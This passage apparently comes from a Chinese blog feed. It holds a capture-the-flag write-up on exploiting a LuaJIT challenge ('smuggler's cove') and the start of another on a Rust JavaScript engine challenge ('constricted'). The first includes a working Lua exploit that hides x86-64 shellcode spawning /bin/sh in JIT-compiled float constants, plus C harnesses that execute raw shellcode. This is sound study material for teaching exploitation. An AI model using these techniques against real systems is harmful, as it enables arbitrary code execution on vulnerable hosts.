class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>这里需要参考以下两个链接来理解 hotcount：</p><ul><li><a href="https://www.jianshu.com/p/a1f394aba9b2">译作：窥斑见豹–Peeking inside luaJIT - 简书</a></li><li><a href="https://blog.csdn.net/u010913001/article/details/102979918">LuaJit Trace Compiler剖析 - CSDN</a></li></ul><p>简单来说，hotcount 就是 luajit 追踪<strong>特定控制流转移指令</strong>（例如调用、跳转等）的一个哈希表，其中存放着所最终指令的热度。luajit 是 <strong>tracing jit</strong>，而非 method jit，这意味着 luajit 在优化时会以<strong>路径</strong>为单位，而不是以函数或方法为单位。既然是追踪路径，那么自然就会对<strong>控制流转移指令</strong>更加的关注，也就会有 hotcount table 这样的设计。</p></li></ul><blockquote><p>不过 cove 对 JIT 的配置不会对我们的漏洞利用产生太大影响，这里只是简单的扩展了一下。</p></blockquote><h2 id="四、漏洞利用">四、漏洞利用</h2><blockquote><p>前置调试知识：</p><p>若需执行程序，则直接执行  <code>LD_LIBRARY_PATH=. ./cove exp.lua</code> 即可。</p><p>若需调试程序，则先 <code>gdb --args ./cove exp.lua</code> 启动 gdb 会话，之后在 gdb 中执行 <code>set env LD_LIBRARY_PATH .</code> 即可。</p></blockquote><p>先写个函数随便试试这个 LuaJIT：</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">func</span><span class="params">()</span></span> </span><br><span class="line">    <span class="keyword">local</span> arr = &#123;<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>&#125;</span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(func)</span><br><span class="line"><span class="comment">-- cargo(func, 0)</span></span><br></pre></td></tr></table></figure><p>结果触发 SIGSEGV 了，调试发现是 cove 中实现的 print 函数触发空指针。修改代码如下：</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"> int print(lua_State* L) &#123;</span><br><span class="line">     if (lua_gettop(L) &lt; 1) &#123;</span><br><span class="line">         return luaL_error(L, &quot;expecting at least 1 arguments&quot;);</span><br><span class="line">     &#125;</span><br><span class="line">     const char* s = lua_tostring(L, 1);</span><br><span class="line"><span class="deletion">-    puts(s);</span></span><br><span class="line"><span class="addition">+    puts(s ? s : &quot;(nil)&quot;);</span></span><br><span class="line">     return 0;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure><p>重新编译后执行就不再触发 SIGSEGV 了。</p><p>再增加两个调用点，<code>func</code> 函数就会被 JIT 技术进行优化：</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">func</span><span class="params">()</span></span> </span><br><span class="line">    <span class="keyword">local</span> arr = &#123;<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>&#125;</span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">func()</span><br><span class="line">func()</span><br><span class="line">cargo(func, <span class="number">0</span>)</span><br><span class="line"><span class="comment">-- 输出：INSPECTION: This ship&#x27;s JIT cargo was found to be 0x800021feffdc</span></span><br></pre></td></tr></table></figure><p>从 GDB 中的信息可以得知，该位置确实存放着所生成的机器指令，而这个位置位于一个 rx 段上：</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830140103661.png" alt="image-20220830140103661"></p><p>在这个JIT生成的机器指令下断，下次执行 <code>func</code> 函数时就会触发这个断点（注意下图与上图不对应）；而修改调用 <code>cargo</code> 函数的第二个参数 offset，下次<strong>执行 JIT 函数时控制流也就会真的偏离 offset 个字节</strong>。：</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830140429872.png" alt="image-20220830140429872"></p><p>现在我们已经了解如何触发函数的 JIT 优化，并且大致了解了其 JIT 所生成的机器码的情况，接下来要尝试在 JIT Machine Code 中布上我们特定的立即数。有一点需要注意，<strong>在 lua 中数字只有 <code>Number</code> 这么一个类型，不区分整型和浮点数型</strong>，不过 LuaJIT 内部是使用<strong>浮点数</strong>来表示 lua 的 Number 类型。这个可以用以下 lua 代码验证：</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- 一个大数</span></span><br><span class="line">num1 = <span class="number">0x112233445566</span></span><br><span class="line"><span class="built_in">print</span>(num1)        <span class="comment">-- 输出 18838586676582</span></span><br><span class="line">num1 = num1 + <span class="number">0.5</span></span><br><span class="line"><span class="comment">-- 输出时精度丢失</span></span><br><span class="line"><span class="built_in">print</span>(num1)        <span class="comment">-- 输出 18838586676583</span></span><br><span class="line"></span><br><span class="line"><span class="comment">-- 超大数，输出浮点数表示法</span></span><br><span class="line">num1 = <span class="number">0x1122334455667788</span></span><br><span class="line"><span class="built_in">print</span>(num1)        <span class="comment">--输出 1.2346056164365e+18</span></span><br></pre></td></tr></table></figure><p>现在尝试在 JIT Code 中部署特定值。由于 LuaJIT 启用了许多编译优化，例如 dead code elimination，因此<strong>在函数中创建数组对象后需要至少使用该对象一次</strong>，否则该对象将直接被删除。由于 print 函数实在是太难用了，因此换了种方法防止被优化。</p><p>编写的测试 lua 代码如下：</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">func</span><span class="params">(arr)</span></span> </span><br><span class="line">    arr[<span class="number">0</span>] = <span class="number">1.0</span>;</span><br><span class="line">    arr[<span class="number">1</span>] = <span class="number">2.0</span>;</span><br><span class="line">    arr[<span class="number">2</span>] = <span class="number">3.0</span>;</span><br><span class="line">    arr[<span class="number">3</span>] = <span class="number">4.0</span>;</span><br><span class="line">    arr[<span class="number">4</span>] = <span class="number">5.0</span>;</span><br><span class="line">    arr[<span class="number">5</span>] = <span class="number">6.0</span>;</span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">arr = &#123;<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>&#125;</span><br><span class="line">func(arr)</span><br><span class="line">func(arr)</span><br><span class="line">cargo(func, <span class="number">0</span>)</span><br><span class="line">func(arr)</span><br></pre></td></tr></table></figure><p>查看编译后的代码，发现生成的 JIT 代码无法满足要求，LuaJIT 会<strong>把等号后的数单独保存</strong>至其他内存位置，需要使用时再去加载：</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830143407321.png" alt="image-20220830143407321"></p><p>由于等号后边的内容再怎么便都无法改变被加载至其他内存的事实，因此我们可以尝试修改等号前面的<strong>属性内容</strong>，即 <code>arr[xxx] = _</code> 中的 <strong>xxx</strong>。</p><p>在经过一番尝试后，发现属性如果是：</p><ul><li><p>字符或字符串，则 JIT code 中会存在大量立即数，但是<strong>不可控</strong>。</p></li><li><p>诸如 1.0、2.0、3.0 等<strong>整型且连续的浮点数</strong>，则所生成的 JIT Code 还是会和先前的 JIT code 一致。</p></li><li><p><strong>不连续的浮点数</strong>，则所生成的代码将正是我们所需要的那种。例如以下 lua 代码：</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">func</span><span class="params">(arr)</span></span> </span><br><span class="line">    arr[<span class="number">1.0</span>] = <span class="number">1</span>;</span><br><span class="line">    arr[<span class="number">5.0</span>] = <span class="number">2</span>;</span><br><span class="line">    arr[<span class="number">21.0</span>] = <span class="number">3</span>;</span><br><span class="line">    arr[<span class="number">244.0</span>] = <span class="number">4</span>;</span><br><span class="line">    arr[<span class="number">21.0</span>] = <span class="number">5</span>;</span><br><span class="line">    arr[<span class="number">422.0</span>] = <span class="number">6</span>;</span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">arr = &#123;<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>&#125;</span><br><span class="line">func(arr)</span><br><span class="line">func(arr)</span><br><span class="line">cargo(func, <span class="number">0</span>)</span><br><span class="line">func(arr)</span><br></pre></td></tr></table></figure><p>所生成的 JIT Code：</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830145419116.png" alt="image-20220830145419116"></p></li></ul><p>这样一来，我们便可以达到<strong>在 JIT Code 上部署特定数据</strong>的目的，接下来便是编写 shellcode 并将其部署在 JIT Code 上，这个就是体力活了。</p><blockquote><p>这里需要推荐一个网站 <a href="https://tooltt.com/floatconverter/">在线浮点数转二进制</a>，这个网站可以非常方便的<strong>转换浮点数与二进制</strong>。</p></blockquote><p>我编写的 exploit 如下所示（<strong>注意，这个 exp 存在亿点点问题</strong>）：</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">f</span><span class="params">(a)</span></span> </span><br><span class="line">    a[<span class="number">1.2015822066494834e-135</span>] = <span class="number">1</span>; <span class="comment">-- 4831f6 4889f2 ebxx  0x(23ebf28948f63148)</span></span><br><span class="line">    a[<span class="number">1.888017891495551e-193</span>] = <span class="number">2</span>; <span class="comment">-- 4889f1 56 9090 ebxx 0x(17eb909056f18948)</span></span><br><span class="line">    a[<span class="number">1.8732669152797884e-193</span>] = <span class="number">3</span>; <span class="comment">-- 682f62696e 59 ebxx 0x(17eb596e69622f68)</span></span><br><span class="line">    a[<span class="number">1.8748660135882913e-193</span>] = <span class="number">4</span>; <span class="comment">-- 682f2f7368 5f ebxx 0x(17eb5f68732f2f68)</span></span><br><span class="line">    a[<span class="number">1.8880176708811596e-193</span>] = <span class="number">5</span>; <span class="comment">-- 48c1e720 9090 ebxx 0x(17eb909020e7c148)</span></span><br><span class="line">    a[<span class="number">2.383013609192317e-222</span>] = <span class="number">6</span>; <span class="comment">-- 4809cf 57 9090 ebxx 0x(11eb909057cf0948)</span></span><br><span class="line">    a[<span class="number">1.872946064693589e-193</span>] = <span class="number">7</span>; <span class="comment">-- 4889e7 6a3b 58 ebxx 0x(17eb583b6ae78948)</span></span><br><span class="line">    a[<span class="number">1.8880178917328522e-193</span>] = <span class="number">8</span>; <span class="comment">-- 99 6a00 57 9090 ebxx 0x(17eb909057006a99)</span></span><br><span class="line">    a[<span class="number">-2.4120921044623575e+255</span>] = <span class="number">9</span>; <span class="comment">-- 4889e6 0f05 90 f4f4 0x(f4f490050fe68948)</span></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">a = &#123;<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>&#125;</span><br><span class="line">f(a)</span><br><span class="line">f(a)</span><br><span class="line">cargo(f, <span class="number">0x80</span>)</span><br><span class="line">f(a)</span><br></pre></td></tr></table></figure><p>其实际执行的 shellcode 为：</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">4831f6        xor %rsi, %rsi</span><br><span class="line">4889f2        mov %rdx, %rsi</span><br><span class="line">4889f1        mov %rcx, %rsi</span><br><span class="line"></span><br><span class="line">56            push %rsi</span><br><span class="line">682f62696e    push 0x6e69622f</span><br><span class="line">59            pop rcx</span><br><span class="line">682f2f7368    push 0x68732f2f</span><br><span class="line">5f            pop rdi</span><br><span class="line">48c1e720      shl %rdi, 32</span><br><span class="line">4809cf        or %rdi, %rcx</span><br><span class="line">57            push %rdi</span><br><span class="line">4889e7        mov %rdi, %rsp</span><br><span class="line"></span><br><span class="line">6a3b          push 0x3b</span><br><span class="line">58            pop %rax</span><br><span class="line">99            cltd</span><br><span class="line"></span><br><span class="line">6a00          push 0</span><br><span class="line">57            push %rdi</span><br><span class="line">4889e6        mov %rsi, %rsp</span><br><span class="line"></span><br><span class="line">0f05          syscall</span><br></pre></td></tr></table></figure><blockquote><p>注：<code>jmp rel8</code> 的机器码为 <code>eb</code>。</p></blockquote><p>这里就快执行 <code>SYS_execve(&quot;/bin//sh&quot;, [&quot;/bin//sh&quot;, NULL], NULL)</code> 了（mcode + 0x181）：</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830202644199.png" alt="image-20220830202644199"></p><p>但比较奇怪的是，sh 直接退出了：</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830202913401.png" alt="image-20220830202913401"></p><p>但我手动写了个代码尝试复现：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="type">char</span>* path = <span class="string">&quot;/bin//sh&quot;</span>;</span><br><span class="line">    <span class="type">char</span>* argv[] = &#123; path, <span class="literal">NULL</span> &#125;;</span><br><span class="line">    execve(path, argv, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">abort</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但是复现失败了：</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830203612583.png" alt="image-20220830203612583"></p><p>即便是直接执行 shellcode：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">char</span>* shellcode = <span class="string">&quot;\x48\x31\xf6\x48\x89\xf2\x48\x89\xf1\x56\x68\x2f\x62&quot;</span></span><br><span class="line">                  <span class="string">&quot;\x69\x6e\x59\x68\x2f\x2f\x73\x68\x5f\x48\xc1\xe7\x20\x48&quot;</span></span><br><span class="line">                  <span class="string">&quot;\x09\xcf\x57\x48\x89\xe7\x6a\x3b\x58\x99\x6a\x00\x57\x48\x89\xe6\x0f\x05&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="comment">// char* path = &quot;/bin//sh&quot;;</span></span><br><span class="line">    <span class="comment">// char* argv[] = &#123; path, NULL &#125;;</span></span><br><span class="line">    <span class="comment">// execve(path, argv, NULL);</span></span><br><span class="line">    </span><br><span class="line">    <span class="type">char</span> buffer[<span class="number">50</span>];</span><br><span class="line">    <span class="built_in">memcpy</span>(buffer, shellcode, <span class="number">50</span>);</span><br><span class="line">    <span class="type">void</span> (*scfunc)() = buffer;</span><br><span class="line">    scfunc();</span><br><span class="line">    <span class="built_in">abort</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>也无法复现这种 <code>/bin/sh</code> 直接退出的情况：</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830204619529.png" alt="image-20220830204619529"></p><p>百思不得其解。于是用 gdb 的 <code>catch exec</code> 指令，进入被调用的 dash 子进程开始调试，最后才发现原来是因为 <strong>stdin 被关闭了</strong>（捂脸）：</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830214854162.png" alt="image-20220830214854162"></p><p>反过来才发现，cove 代码中其实早有说明，但是当时就是给漏看了：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">run_code</span><span class="params">(lua_State* L, <span class="type">char</span>* path)</span> &#123;</span><br><span class="line">    <span class="type">const</span> <span class="type">size_t</span> max_size = MAX_SIZE;</span><br><span class="line">    <span class="type">char</span>* code = <span class="built_in">calloc</span>(max_size+<span class="number">1</span>, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">    FILE* f = fopen(path,<span class="string">&quot;r&quot;</span>);</span><br><span class="line">    ...</span><br><span class="line">    fseek(f, <span class="number">0</span>, SEEK_END);</span><br><span class="line">    <span class="type">size_t</span> size = ftell(f);</span><br><span class="line">    ...</span><br><span class="line">    fseek(f, <span class="number">0</span>, SEEK_SET);</span><br><span class="line">    fread(code, <span class="number">1</span>, size, f);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 这里！stdin 被关闭</span></span><br><span class="line">    fclose(<span class="built_in">stdin</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> ret = luaL_dostring(L, code);</span><br><span class="line">    <span class="keyword">if</span> (ret != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Lua error: %s\n&quot;</span>, lua_tostring(L, <span class="number">-1</span>));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>麻了，只能说还是自己观察的不够细致，踩了个坑。</p><p>本题复盘结束，完结撒花！</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里将记录着本人复盘 Defcon 30 Quals 中 &lt;code&gt;smuggler&#39;s cove&lt;/code&gt; 的复盘笔记。&lt;/p&gt;
&lt;p&gt;本题是一道 luaJIT 的 pwn 题。&lt;/p&gt;</summary>
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
  </entry>
  
  <entry>
    <title>Defcon-30-Quals rust-pwn constricted 复盘笔记</title>
    <link href="https://kiprey.github.io/2022/08/defcon30quals_constricted/"/>
    <id>https://kiprey.github.io/2022/08/defcon30quals_constricted/</id>
    <published>2022-08-26T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.972Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里将记录着本人复盘 Defcon 30 Quals 中 <code>constricted</code> 的复盘笔记。</p><p>这道题为 <code>boa</code> 项目提供了一个 git diff，要求在应用这个 diff 后对 boa 进行漏洞利用。boa 是一个<strong>使用 rust 编写的 javascript 引擎</strong>，要想 pwn 掉它就得编写 JS 的漏洞利用脚本。</p><p>当初做这题时自己还没接触过 rust，这次 <s>学成归来后</s> 可以好好看看这题。</p><p>这题的意图是想说明，<strong>即便是用 rust 编写的程序也仍然会存在漏洞</strong>。</p><span id="more"></span><blockquote><p>注意，本题的调试是在实机中进行，<strong>非 docker 环境</strong>，因此 exp 可能不通用。</p></blockquote><h2 id="二、diff-内容">二、diff 内容</h2><p>这里的 diff 总结起来大致如下：</p><ol><li><p>在程序启动时随机 mmap 了一块内存。这里的 ctor 说明这个 init 函数需要在执行 main 函数前被执行：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> libc::&#123;getrandom, mmap, MAP_PRIVATE, MAP_ANON&#125;;</span><br><span class="line"><span class="keyword">use</span> std::ptr;</span><br><span class="line"><span class="keyword">use</span> ctor::*;</span><br><span class="line"></span><br><span class="line"><span class="meta">#[ctor]</span></span><br><span class="line"><span class="keyword">unsafe</span> <span class="keyword">fn</span> <span class="title function_">init</span>() &#123;</span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut </span><span class="variable">buf</span> = [<span class="number">0u8</span>; <span class="number">4</span>];</span><br><span class="line">    <span class="title function_ invoke__">getrandom</span>(buf.<span class="title function_ invoke__">as_mut_ptr</span>() <span class="keyword">as</span> *<span class="keyword">mut</span> libc::c_void, <span class="number">4</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">let</span> <span class="variable">off</span> = std::mem::transmute::&lt;[<span class="type">u8</span>; <span class="number">4</span>], <span class="type">u32</span>&gt;(buf).<span class="title function_ invoke__">to_le</span>() <span class="keyword">as</span> <span class="type">usize</span>;</span><br><span class="line">    <span class="keyword">let</span> <span class="variable">off</span> = off &lt;&lt; <span class="number">12</span>;</span><br><span class="line">    <span class="keyword">let</span> <span class="variable">length</span> = <span class="number">0x80000000</span> + off;</span><br><span class="line">    <span class="title function_ invoke__">mmap</span>(ptr::<span class="title function_ invoke__">null_mut</span>(), length, <span class="number">0</span>, MAP_PRIVATE | MAP_ANON, -<span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>引入一个新的 JSObject 对象 <code>TimedCache</code>：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt; <span class="keyword">let</span> v = <span class="keyword">new</span> <span class="title class_">TimedCache</span>()</span><br><span class="line"><span class="literal">undefined</span></span><br><span class="line">&gt;&gt; v</span><br><span class="line"><span class="title class_">TimedCache</span>()</span><br></pre></td></tr></table></figure><p>TimedCache 类代码在 <code>boa_engine/src/builtins/timed_cache/mod.rs</code> 中，这个类中有三个函数，分别是 <code>get</code>、<code>set</code> 和 <code>has</code>。这三个方法都和时间有关，<strong>功能类似一个定时器</strong>，可以用 set 函数安装定时器、get 函数获取目标定时器剩余时间，以及用 has 函数查看定时器是否超时。</p></li><li><p>在 console 类上额外实现了几个方法，分别是：</p><ol><li><p><code>console.sysbreak()</code>：调用该函数会触发一个 int3 中断。</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt; <span class="variable language_">console</span>.<span class="title function_">sysbreak</span>()</span><br><span class="line">[<span class="number">1</span>]    <span class="number">155238</span> trace <span class="title function_">trap</span> (core dumped)  target/debug/boa</span><br></pre></td></tr></table></figure></li><li><p><code>console.sleep(ms)</code>：线程暂停一段时间，单位毫秒。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt; console.<span class="built_in">sleep</span>(<span class="number">1000</span>) <span class="comment">// sleep 1s</span></span><br><span class="line">undefined</span><br></pre></td></tr></table></figure></li><li><p><code>console.collectGarbage()</code>：强制触发垃圾回收。这里触发的垃圾回收机制是 <code>gc = &quot;0.4.1&quot;</code> crate 内的，即 <a href="https://github.com/Manishearth/rust-gc">rust-gc</a>。</p></li><li><p>增强了 <code>console.debug</code> 方法，以更好的输出信息。</p></li></ol></li><li><p>在 <code>boa_engine/src/object/internal_methods/</code>文件夹中，为半数以上的类做了个修改，让<strong>被修改类的每个静态 internal method 对象</strong>都<strong>分配在堆上，而不是在 data 段上</strong>。</p></li></ol><h2 id="三、漏洞定位">三、漏洞定位</h2><p>从上面总结的 diff 可以看出，diff 中：</p><ol><li><p>提供了<code>console.sleep</code>、<code>TimedCache</code> 这种与时间处理有关的方法和类。</p></li><li><p>大肆修改静态对象的分配位置<strong>至堆上</strong>（原本在 data 段上好好的偏偏就要改到堆上）。</p></li><li><p>主动暴露出 rust-gc 强制触发垃圾回收的接口 <code>console.collectGarbage</code>。</p></li></ol><p>那么这题无疑就是和 rust-gc 做斗争。可能有人会问，rust 不是不需要 gc 么？的确如此，但是只通过 Arc 和 Rc 来管理内存可能会造成循环引用等非常难顶的情况， 同时也加大了开发难度。为了平衡内存管理的安全性与开发效率，rust-gc crate 便发挥出了它的作用。</p><p>rust-gc 是一个 <code>mark-sweep</code> 类型的 GC，只有被 mark 的对象才会保留，没有 mark 的对象会在垃圾回收时被销毁。相关信息在 <a href="https://github.com/Manishearth/rust-gc">rust-gc - github</a> 上，一定要先看完里面的内容，了解 rust-gc 大致的用法。</p><p>在之前总结 diff 内容时我省略掉了关于 TimedCache 类的实现细节，而这里就是关键。在 <code>boa_engine/src/builtins/timed_cache/mod.rs</code> 中， <code>TimedCacheValue</code> 类使用 <code>boa_gc</code> （即 rust-gc 的 wrapper）来管理类实例：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#[derive(Debug, Clone)]</span></span><br><span class="line"><span class="keyword">pub</span> <span class="keyword">struct</span> <span class="title class_">TimeCachedValue</span> &#123;</span><br><span class="line">    expire: <span class="type">u128</span>,</span><br><span class="line">    data: JsObject,</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line"><span class="keyword">impl</span> <span class="title class_">Finalize</span> <span class="keyword">for</span> <span class="title class_">TimeCachedValue</span> &#123;&#125;</span><br><span class="line"><span class="keyword">unsafe</span> <span class="keyword">impl</span> <span class="title class_">Trace</span> <span class="keyword">for</span> <span class="title class_">TimeCachedValue</span> &#123;</span><br><span class="line">    custom_trace!(this, &#123;</span><br><span class="line">        <span class="keyword">if</span> !this.<span class="title function_ invoke__">is_expired</span>() &#123;</span><br><span class="line">            <span class="title function_ invoke__">mark</span>(&amp;this.data);</span><br><span class="line">        &#125; </span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>若 <code>TimeCachedValue</code> 中<strong>所保存的计时器超时</strong>，那么 TimeCachedValue 实例中的 <strong>data 将不再被标记</strong>，这意味着在超时后的某个时间点，这个 data 所占用的内存将会被释放。注意 data 字段的类型 <code>JsObject</code> 也是一个 <code>GC</code> 类型：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">pub</span> <span class="keyword">struct</span> <span class="title class_">JsObject</span> &#123;</span><br><span class="line">    inner: Gc&lt;boa_gc::Cell&lt;Object&gt;&gt;,</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但要注意的是，<code>Gc&lt;_&gt;</code> 只是一个 <code>Gc::Cell</code> 的指针类型。换句话说虽然 